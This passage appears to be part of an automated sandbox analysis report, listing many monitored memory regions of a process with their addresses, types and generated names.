pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10231 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10236 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10237 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10238 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10239 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10240 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10241 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10242 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10243 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10244 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10245 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10246 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10247 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10248 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10249 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10250 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10274 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10275 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10284 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10285 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10289 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10290 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10291 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10292 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10297 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10298 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10301 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10302 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10303 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10304 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10305 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10318 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10319 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10322 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10323 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10327 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10328 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10341 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10342 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10343 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10344 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10345 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10346 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10347 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10348 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10349 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10350 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10351 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10352 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10353 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10378 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10379 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10416 start_va = 0x610000 